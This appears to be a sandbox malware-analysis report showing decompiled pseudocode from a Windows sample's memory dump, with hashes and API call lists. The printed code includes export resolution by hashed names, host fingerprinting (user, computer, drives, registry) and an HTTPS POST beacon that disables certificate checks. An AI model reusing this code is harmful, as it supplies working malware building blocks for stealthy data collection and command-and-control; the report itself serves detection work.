                                                                                        0x00401713
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004016f5
                                                                                        0x004016f5
                                                                                        0x004016fc
                                                                                        0x004016fc

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c7e72c307177f6a1db432bd4753912065af70b35d513cc741f195f205da1b5c
                                                                                        • Instruction ID: 62198b74f6ec90cd68ae938ca120177b071c0c5c86d7114dca3690ffeb8fd3c9
                                                                                        • Opcode Fuzzy Hash: 7c7e72c307177f6a1db432bd4753912065af70b35d513cc741f195f205da1b5c
                                                                                        • Instruction Fuzzy Hash: 8511F53BF0412006DE75200DF1903EF525A83EA3B1F070577EA69BB3E4A13C5CCA8199
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004017AE, Relevance: .1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E004017AE(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				void* _t39;
				void* _t42;
				intOrPtr* _t43;

				_v8 = 0;
				_t25 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
				_t33 = _t25 + 0xc;
				_t43 =  *((intOrPtr*)(_t25 + 0xc));
				while(1) {
					_t40 = _t43 + 0x2c;
					E004011D1(_t25,  *((intOrPtr*)(_t43 + 0x30)));
					if(E00401000( *((intOrPtr*)(_t43 + 0x30)),  *_t40 & 0x0000ffff, 0xffffffff) == _a4) {
						break;
					}
					_t43 =  *_t43;
					if(_t33 != _t43) {
						continue;
					}
					L13:
					return _v8;
				}
				_t34 =  *((intOrPtr*)(_t43 + 0x18));
				_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x3c)) + _t34 + 0x78));
				if(_t38 != 0) {
					_t39 = _t38 + _t34;
					_t30 =  *((intOrPtr*)(_t39 + 0x18));
					_v12 = _t30;
					_t42 =  *((intOrPtr*)(_t39 + 0x24)) + _t34;
					do {
						asm("lodsd");
						_t31 = 0;
						_t37 = _t30 + _t34;
						while( *((char*)(_t37 + _t31)) != 0) {
							_t31 = _t31 + 1;
						}
						_t30 = E00401000(_t37, _t31, 0xffffffff);
						if(_t30 != _a8) {
							goto L10;
						} else {
							asm("lodsd");
							_v8 = _t30 + _t34;
						}
						break;
						L10:
						_t42 = _t42 + 2;
						_v12 = _v12 - 1;
					} while (_v12 != 0);
				} else {
				}
				goto L13;
			}














                                                                                        0x004017b9
                                                                                        0x004017c6
                                                                                        0x004017c9
                                                                                        0x004017cc
                                                                                        0x004017cf
                                                                                        0x004017cf
                                                                                        0x004017d8
                                                                                        0x004017eb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040184f
                                                                                        0x00401853
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401859
                                                                                        0x00401864
                                                                                        0x00401864
                                                                                        0x004017ed
                                                                                        0x004017f5
                                                                                        0x004017fa
                                                                                        0x004017fe
                                                                                        0x00401800
                                                                                        0x00401803
                                                                                        0x0040180e
                                                                                        0x00401810
                                                                                        0x00401810
                                                                                        0x00401813
                                                                                        0x00401815
                                                                                        0x0040181a
                                                                                        0x00401819
                                                                                        0x00401819
                                                                                        0x00401824
                                                                                        0x0040182c
                                                                                        0x00000000
                                                                                        0x0040182e
                                                                                        0x00401839
                                                                                        0x0040183c
                                                                                        0x0040183c
                                                                                        0x00000000
                                                                                        0x00401841
                                                                                        0x00401841
                                                                                        0x00401844
                                                                                        0x00401847
                                                                                        0x00000000
                                                                                        0x004017fc
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 76da5388272f0654a036035e2ae43d9bacd86774028a8486ef1af727eb1b6df4
                                                                                        • Instruction ID: 7d75c00d8e0aabca25eade6b4d333c433445153db727a473c40db91fda26082c
                                                                                        • Opcode Fuzzy Hash: 76da5388272f0654a036035e2ae43d9bacd86774028a8486ef1af727eb1b6df4
                                                                                        • Instruction Fuzzy Hash: 5D21C173E00115DFCB10DF05C880A6AB3F5FB54324F25827AE819B73A1D739AE85CAA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A288, Relevance: .0, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040A288() {
				intOrPtr _t9;
				intOrPtr _t10;

				_t10 =  *[fs:0x30];
				 *0x40f5d6 =  *((intOrPtr*)(_t10 + 0x18));
				 *0x40f5da =  *((intOrPtr*)(_t10 + 8));
				 *0x40f5de =  *((intOrPtr*)(_t10 + 0x64));
				_t9 =  *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x10)) + 0x44));
				 *0x40f5e2 = _t9;
				return _t9;
			}





                                                                                        0x0040a289
                                                                                        0x0040a293
                                                                                        0x0040a29b
                                                                                        0x0040a2a3
                                                                                        0x0040a2ab
                                                                                        0x0040a2ae
                                                                                        0x0040a2b4

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b21beb61abe3ae5801963b42da0289d90e85e0eb80719bcbfbfbdb54e159fae2
                                                                                        • Instruction ID: cba434550d4dbedab9be969996abf8f637f6bb048d72f448dedacbbc1a88f4bd
                                                                                        • Opcode Fuzzy Hash: b21beb61abe3ae5801963b42da0289d90e85e0eb80719bcbfbfbdb54e159fae2
                                                                                        • Instruction Fuzzy Hash: 7DE026B5605200DFC768DF18DA5090177F4F748214720047DD409DBB52D736D806CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004085B7, Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 251memorynetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004085B7(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				long _v36;
				long _v40;
				short _v50;
				char _v66;
				short _v98;
				void* _t93;
				int _t94;
				long _t98;
				intOrPtr* _t104;
				char _t111;
				char _t113;
				long _t114;
				char _t115;
				char _t118;
				signed int _t124;
				long _t126;
				void* _t127;
				void* _t128;
				char* _t129;
				wchar_t* _t130;
				void* _t131;
				void* _t132;
				void* _t133;

				_v32 = 0;
				_v28 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(_a4 != 0) {
					_t124 = E00405248(0x40f580, 0x10, _a4, _a8);
					__eflags = _t124;
					if(_t124 != 0) {
						_v32 = RtlAllocateHeap( *0x40f5d6, 8, _t124 * 4);
						__eflags = _v32;
						if(_v32 != 0) {
							_t93 = E0040132C(_a4, _t124, _v32);
							_t94 = strlen("0601ac206b9e361");
							_t132 = _t131 + 4;
							_t16 = _t94 + 0x16; // 0x16
							_v28 = RtlAllocateHeap( *0x40f5d6, 8, _t93 + _t16);
							__eflags = _v28;
							if(_v28 != 0) {
								_t129 =  &_v98;
								 *_t129 = 0x78382e25;
								_t129[4] = 0x2673253d;
								_t129[8] = 0x78382e25;
								_t129[0xc] = 0x73253d;
								_t98 = sprintf(_v28, _t129, E004049F9(), _v32, _t127, "0601ac206b9e361");
								_t133 = _t132 + 0x18;
								_t126 = _t98;
								_v24 = E00401D08(0x40f057);
								__eflags = _v24;
								if(_v24 != 0) {
									_v8 = InternetOpenW(_v24, 0, 0, 0, 0);
									__eflags = _v8;
									if(_v8 != 0) {
										_t130 =  *0x40f5c6; // 0x0
										__eflags = _t130;
										if(_t130 != 0) {
											while(1) {
												_v12 = InternetConnectW(_v8, _t130, 0x1bb, 0, 0, 3, 0, 0);
												__eflags = _v12;
												if(__eflags != 0) {
													goto L20;
												}
												L15:
												_t118 = wcslen(_t130);
												_t133 = _t133 + 4;
												__eflags = _t118;
												if(_t118 != 0) {
													_t130 = _t130 + 2 + _t118 * 2;
													__eflags =  *_t130;
													if( *_t130 != 0) {
														continue;
													} else {
													}
												} else {
												}
												goto L36;
												L20:
												E00408933(__eflags,  &_v98);
												_t104 =  &_v50;
												 *_t104 = 0x4f0050;
												 *((intOrPtr*)(_t104 + 4)) = 0x540053;
												 *((short*)(_t104 + 8)) = 0;
												_v16 = HttpOpenRequestW(_v12,  &_v50,  &_v98, 0, 0, 0, 0x800000, 0);
												__eflags = _v16;
												if(_v16 != 0) {
													_v20 = E00401D08(0x40f0f7);
													__eflags = _v20;
													if(_v20 != 0) {
														_v36 = 0;
														_v40 = 4;
														_t111 = InternetQueryOptionW(_v16, 0x1f,  &_v36,  &_v40);
														__eflags = _t111;
														if(_t111 != 0) {
															_v36 = _v36 | 0x84603300;
															_t113 = InternetSetOptionW(_v16, 0x1f,  &_v36, 4);
															__eflags = _t113;
															if(_t113 != 0) {
																_t114 = wcslen(_v20);
																_t133 = _t133 + 4;
																_t115 = HttpSendRequestW(_v16, _v20, _t114, _v28, _t126);
																__eflags = _t115;
																if(_t115 != 0) {
																	_v40 = 0x10;
																	_v36 = 0;
																	_t128 =  &_v66;
																	_t118 = HttpQueryInfoW(_v16, 0x13, _t128,  &_v40,  &_v36);
																	__eflags = _t118;
																	if(_t118 == 0) {
																		L35:
																		RtlFreeHeap( *0x40f5d6, 0, _v20);
																		_v20 = 0;
																		InternetCloseHandle(_v16);
																		_v16 = 0;
																		InternetCloseHandle(_v12);
																		_v12 = 0;
																		goto L15;
																	} else {
																		__eflags =  *_t128 - 0x35;
																		if( *_t128 != 0x35) {
																			goto L35;
																		} else {
																			__eflags =  *((short*)(_t128 + 2)) - 0x30;
																			if( *((short*)(_t128 + 2)) != 0x30) {
																				goto L35;
																			} else {
																				__eflags =  *((short*)(_t128 + 4)) - 0x30;
																				if( *((short*)(_t128 + 4)) != 0x30) {
																					goto L35;
																				} else {
																				}
																			}
																		}
																	}
																} else {
																}
															} else {
															}
														} else {
														}
													} else {
													}
												} else {
													InternetCloseHandle(_v12);
													_v12 = 0;
													goto L15;
												}
												goto L36;
											}
										} else {
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
				} else {
				}
				L36:
				if(_v16 != 0) {
					_t118 = InternetCloseHandle(_v16);
				}
				if(_v12 != 0) {
					_t118 = InternetCloseHandle(_v12);
				}
				if(_v8 != 0) {
					_t118 = InternetCloseHandle(_v8);
				}
				if(_v20 != 0) {
					_t118 = RtlFreeHeap( *0x40f5d6, 0, _v20);
				}
				if(_v24 != 0) {
					_t118 = RtlFreeHeap( *0x40f5d6, 0, _v24);
				}
				if(_v28 != 0) {
					_t118 = RtlFreeHeap( *0x40f5d6, 0, _v28);
				}
				if(_v32 != 0) {
					return RtlFreeHeap( *0x40f5d6, 0, _v32);
				}
				return _t118;
			}

































                                                                                        0x004085c2
                                                                                        0x004085c9
                                                                                        0x004085d0
                                                                                        0x004085d7
                                                                                        0x004085de
                                                                                        0x004085e5
                                                                                        0x004085f0
                                                                                        0x00408609
                                                                                        0x0040860b
                                                                                        0x0040860d
                                                                                        0x0040862a
                                                                                        0x0040862d
                                                                                        0x00408631
                                                                                        0x0040863f
                                                                                        0x0040864b
                                                                                        0x00408651
                                                                                        0x00408654
                                                                                        0x00408667
                                                                                        0x0040866a
                                                                                        0x0040866e
                                                                                        0x00408675
                                                                                        0x00408678
                                                                                        0x0040867e
                                                                                        0x00408685
                                                                                        0x0040868c
                                                                                        0x004086a6
                                                                                        0x004086ac
                                                                                        0x004086af
                                                                                        0x004086bb
                                                                                        0x004086be
                                                                                        0x004086c2
                                                                                        0x004086da
                                                                                        0x004086dd
                                                                                        0x004086e1
                                                                                        0x004086e8
                                                                                        0x004086ee
                                                                                        0x004086f0
                                                                                        0x004086f7
                                                                                        0x00408710
                                                                                        0x00408713
                                                                                        0x00408717
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408719
                                                                                        0x0040871a
                                                                                        0x00408720
                                                                                        0x00408723
                                                                                        0x00408725
                                                                                        0x0040872c
                                                                                        0x00408730
                                                                                        0x00408734
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408736
                                                                                        0x00000000
                                                                                        0x00408727
                                                                                        0x00000000
                                                                                        0x0040873d
                                                                                        0x00408741
                                                                                        0x00408746
                                                                                        0x00408749
                                                                                        0x0040874f
                                                                                        0x00408756
                                                                                        0x0040877a
                                                                                        0x0040877d
                                                                                        0x00408781
                                                                                        0x0040879f
                                                                                        0x004087a2
                                                                                        0x004087a6
                                                                                        0x004087ad
                                                                                        0x004087b4
                                                                                        0x004087c8
                                                                                        0x004087ce
                                                                                        0x004087d0
                                                                                        0x004087d7
                                                                                        0x004087e9
                                                                                        0x004087ef
                                                                                        0x004087f1
                                                                                        0x004087fb
                                                                                        0x00408801
                                                                                        0x0040880f
                                                                                        0x00408815
                                                                                        0x00408817
                                                                                        0x0040881e
                                                                                        0x00408825
                                                                                        0x0040882c
                                                                                        0x0040883d
                                                                                        0x00408843
                                                                                        0x00408845
                                                                                        0x0040885d
                                                                                        0x00408868
                                                                                        0x0040886e
                                                                                        0x00408878
                                                                                        0x0040887e
                                                                                        0x00408888
                                                                                        0x0040888e
                                                                                        0x00000000
                                                                                        0x00408847
                                                                                        0x00408847
                                                                                        0x0040884b
                                                                                        0x00000000
                                                                                        0x0040884d
                                                                                        0x0040884d
                                                                                        0x00408852
                                                                                        0x00000000
                                                                                        0x00408854
                                                                                        0x00408854
                                                                                        0x00408859
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040885b
                                                                                        0x00408859
                                                                                        0x00408852
                                                                                        0x0040884b
                                                                                        0x00000000
                                                                                        0x00408819
                                                                                        0x00000000
                                                                                        0x004087f3
                                                                                        0x00000000
                                                                                        0x004087d2
                                                                                        0x00000000
                                                                                        0x004087a8
                                                                                        0x00408783
                                                                                        0x00408786
                                                                                        0x0040878c
                                                                                        0x00000000
                                                                                        0x0040878c
                                                                                        0x00000000
                                                                                        0x00408781
                                                                                        0x00000000
                                                                                        0x004086f2
                                                                                        0x00000000
                                                                                        0x004086e3
                                                                                        0x00000000
                                                                                        0x004086c4
                                                                                        0x00000000
                                                                                        0x00408670
                                                                                        0x00000000
                                                                                        0x00408633
                                                                                        0x00000000
                                                                                        0x0040860f
                                                                                        0x00000000
                                                                                        0x004085f2
                                                                                        0x0040889f
                                                                                        0x004088a3
                                                                                        0x004088a8
                                                                                        0x004088a8
                                                                                        0x004088b2
                                                                                        0x004088b7
                                                                                        0x004088b7
                                                                                        0x004088c1
                                                                                        0x004088c6
                                                                                        0x004088c6
                                                                                        0x004088d0
                                                                                        0x004088dd
                                                                                        0x004088dd
                                                                                        0x004088e7
                                                                                        0x004088f4
                                                                                        0x004088f4
                                                                                        0x004088fe
                                                                                        0x0040890b
                                                                                        0x0040890b
                                                                                        0x00408915
                                                                                        0x00000000
                                                                                        0x00408922
                                                                                        0x00408930

                                                                                        APIs
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004088A8
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004088B7
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004088C6
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088DD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088F4
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040890B
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408922
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$CloseHandleInternet
                                                                                        • String ID: %.8x$0601ac206b9e361$=%s$=%s&
                                                                                        • API String ID: 2108494971-3183917044
                                                                                        • Opcode ID: 1e91032d1b68d20008cbc787e3a3d2a4868eb0f7d74a4c4202e71baad88772e7
                                                                                        • Instruction ID: 019262c529223721c194e008e8c284c4cb16651cc733332db51cdf77f4131d10
                                                                                        • Opcode Fuzzy Hash: 1e91032d1b68d20008cbc787e3a3d2a4868eb0f7d74a4c4202e71baad88772e7
                                                                                        • Instruction Fuzzy Hash: 50A16071900208EFDF21AF90DE09BAE7BB4FB04304F60803AE641B65E1DB795A59DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004083CA, Relevance: 31.6, APIs: 21, Instructions: 140memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E004083CA() {
				wchar_t* _v8;
				wchar_t* _v12;
				wchar_t* _v16;
				wchar_t* _v20;
				wchar_t* _v24;
				wchar_t* _v28;
				wchar_t* _v32;
				wchar_t* _v36;
				wchar_t* _v40;
				void* _v44;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t62;
				int _t63;
				int _t64;
				int _t65;
				void* _t92;

				_v44 = 0;
				_v40 = E00401D08(0x40edce);
				_v8 = E00407D8B();
				_v12 = E00407EFB();
				_v16 = E00407F99();
				_v20 = E00408016();
				_v24 = E00408132();
				_v28 = E00408160();
				_v32 = E00408249();
				_v36 = E00408371();
				_t58 = wcslen(_v8);
				_t59 = wcslen(_v12);
				_t60 = wcslen(_v16);
				_t61 = wcslen(_v20);
				_t62 = wcslen(_v24);
				_t63 = wcslen(_v28);
				_t64 = wcslen(_v32);
				_t65 = wcslen(_v36);
				_v44 = RtlAllocateHeap( *0x40f5d6, 8, 2 + (_t58 + _t59 + _t60 + _t61 + _t62 + _t63 + _t64 + _t65 + wcslen(_v40)) * 2);
				if(_v44 != 0) {
					_t92 =  *0x40f69c(_v44, _v40, _v20, _v12, _v16, _v24, _v28, _v36, _v8, _v32);
					E00401147(_t79, _v44, _v44);
					_t36 = _t92 + 1; // 0x1
					_v44 = RtlReAllocateHeap( *0x40f5d6, 0, _v44, _t36);
				}
				RtlFreeHeap( *0x40f5d6, 0, _v40);
				RtlFreeHeap( *0x40f5d6, 0, _v8);
				RtlFreeHeap( *0x40f5d6, 0, _v12);
				RtlFreeHeap( *0x40f5d6, 0, _v16);
				RtlFreeHeap( *0x40f5d6, 0, _v20);
				RtlFreeHeap( *0x40f5d6, 0, _v24);
				RtlFreeHeap( *0x40f5d6, 0, _v28);
				RtlFreeHeap( *0x40f5d6, 0, _v32);
				RtlFreeHeap( *0x40f5d6, 0, _v36);
				return _v44;
			}






















                                                                                        0x004083d5
                                                                                        0x004083e6
                                                                                        0x004083ee
                                                                                        0x004083f6
                                                                                        0x004083fe
                                                                                        0x00408406
                                                                                        0x0040840e
                                                                                        0x00408416
                                                                                        0x0040841e
                                                                                        0x00408426
                                                                                        0x0040842c
                                                                                        0x0040843a
                                                                                        0x00408448
                                                                                        0x00408456
                                                                                        0x00408464
                                                                                        0x00408472
                                                                                        0x00408480
                                                                                        0x0040848e
                                                                                        0x004084bd
                                                                                        0x004084c4
                                                                                        0x004084ed
                                                                                        0x004084f5
                                                                                        0x004084fa
                                                                                        0x0040850f
                                                                                        0x0040850f
                                                                                        0x0040851d
                                                                                        0x0040852e
                                                                                        0x0040853f
                                                                                        0x00408550
                                                                                        0x00408561
                                                                                        0x00408572
                                                                                        0x00408583
                                                                                        0x00408594
                                                                                        0x004085a5
                                                                                        0x004085b6

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                          • Part of subcall function 00407D8B: GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00407DA1
                                                                                          • Part of subcall function 00407EFB: GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F2E
                                                                                          • Part of subcall function 00407EFB: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407F47
                                                                                          • Part of subcall function 00407EFB: GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F5D
                                                                                          • Part of subcall function 00407EFB: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407F72
                                                                                          • Part of subcall function 00407F99: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FB9
                                                                                          • Part of subcall function 00407F99: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407FD2
                                                                                          • Part of subcall function 00407F99: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FE8
                                                                                          • Part of subcall function 00407F99: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407FFD
                                                                                          • Part of subcall function 00408016: RegCreateKeyExW.ADVAPI32(80000001,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EF6A,0040EF50,0040EF14,?,00000000), ref: 0040806C
                                                                                          • Part of subcall function 00408016: RegQueryValueExW.ADVAPI32(?,00408406,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 00408098
                                                                                          • Part of subcall function 00408016: RegQueryValueExW.ADVAPI32(?,?,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 004080B6
                                                                                          • Part of subcall function 00408016: RtlAllocateHeap.NTDLL(00000008,00000010), ref: 004080CB
                                                                                          • Part of subcall function 00408016: wcscpy.NTDLL ref: 004080E1
                                                                                          • Part of subcall function 00408016: NtClose.NTDLL(?), ref: 004080ED
                                                                                          • Part of subcall function 00408016: RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 004080FE
                                                                                          • Part of subcall function 00408016: RtlFreeHeap.NTDLL(00000000,00408406), ref: 0040810F
                                                                                          • Part of subcall function 00408016: RtlFreeHeap.NTDLL(00000000,?), ref: 00408120
                                                                                          • Part of subcall function 00408160: RegCreateKeyExW.ADVAPI32(80000002,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EFE0,0040EF82,?,00000000,?,?,00000000), ref: 004081AC
                                                                                          • Part of subcall function 00408160: RegQueryValueExW.ADVAPI32(?,00408416,00000000,00000001,?,00000080,?,00000000,?,?,00000000), ref: 004081DB
                                                                                          • Part of subcall function 00408160: RtlAllocateHeap.NTDLL(00000008,00000080), ref: 004081F0
                                                                                          • Part of subcall function 00408160: wcscpy.NTDLL ref: 00408209
                                                                                          • Part of subcall function 00408160: NtClose.NTDLL(?), ref: 00408215
                                                                                          • Part of subcall function 00408160: RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 00408226
                                                                                          • Part of subcall function 00408160: RtlFreeHeap.NTDLL(00000000,00408416), ref: 00408237
                                                                                          • Part of subcall function 00408249: memset.NTDLL ref: 0040827F
                                                                                          • Part of subcall function 00408249: RegCreateKeyExW.ADVAPI32(80000002,0040F1F6,00000000,00000000,00000000,00020119,00000000,?,?,?,?,00000000), ref: 004082A5
                                                                                          • Part of subcall function 00408249: RegQueryValueExW.ADVAPI32(?,00408ACB,00000000,00000001,?,00000080,?,?,00000000), ref: 004082D8
                                                                                          • Part of subcall function 00408249: RtlAllocateHeap.NTDLL(00000008,0000002A,?), ref: 00408320
                                                                                          • Part of subcall function 00408249: NtClose.NTDLL(?), ref: 0040833D
                                                                                          • Part of subcall function 00408249: RtlFreeHeap.NTDLL(00000000,0040F1F6), ref: 0040834E
                                                                                          • Part of subcall function 00408249: RtlFreeHeap.NTDLL(00000000,00408ACB), ref: 0040835F
                                                                                          • Part of subcall function 00408371: RtlAllocateHeap.NTDLL(00000000,00000008), ref: 00408386
                                                                                        • wcslen.NTDLL ref: 0040842C
                                                                                        • wcslen.NTDLL ref: 0040843A
                                                                                        • wcslen.NTDLL ref: 00408448
                                                                                        • wcslen.NTDLL ref: 00408456
                                                                                        • wcslen.NTDLL ref: 00408464
                                                                                        • wcslen.NTDLL ref: 00408472
                                                                                        • wcslen.NTDLL ref: 00408480
                                                                                        • wcslen.NTDLL ref: 0040848E
                                                                                        • wcslen.NTDLL ref: 0040849C
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004084B7
                                                                                        • _swprintf.NTDLL ref: 004084E4
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00000000), ref: 00408509
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040851D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040852E
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040853F
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408550
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408561
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408572
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040F1C3), ref: 00408583
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040C004), ref: 00408594
                                                                                        • RtlFreeHeap.NTDLL(00000000,004089C5), ref: 004085A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocatewcslen$NameQueryValue$CloseCreate$ComputerUserwcscpy$DriveLogicalStrings_swprintfmemset
                                                                                        • String ID:
                                                                                        • API String ID: 163038443-0
                                                                                        • Opcode ID: 4285a408cb7404e7de5b10c603a16a1f63beaed640eabec9b826ea59315b8b1a
                                                                                        • Instruction ID: e05b2a26a45fa882e0c1d663b97f739c412683bd3cabc5d42f6bf846e013e871
                                                                                        • Opcode Fuzzy Hash: 4285a408cb7404e7de5b10c603a16a1f63beaed640eabec9b826ea59315b8b1a
                                                                                        • Instruction Fuzzy Hash: EF51B3B2900208BFDF219FE0EE4ABADBB71FB08301F144435E601B5571DA765A29AB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407380, Relevance: 24.3, APIs: 16, Instructions: 281memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 004073BA
                                                                                        • wcslen.NTDLL ref: 0040744D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00407466
                                                                                        • _swprintf.NTDLL ref: 00407478
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040748D
                                                                                        • VariantInit.OLEAUT32(?), ref: 00407516
                                                                                        • VariantInit.OLEAUT32(?), ref: 00407520
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407722
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407739
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
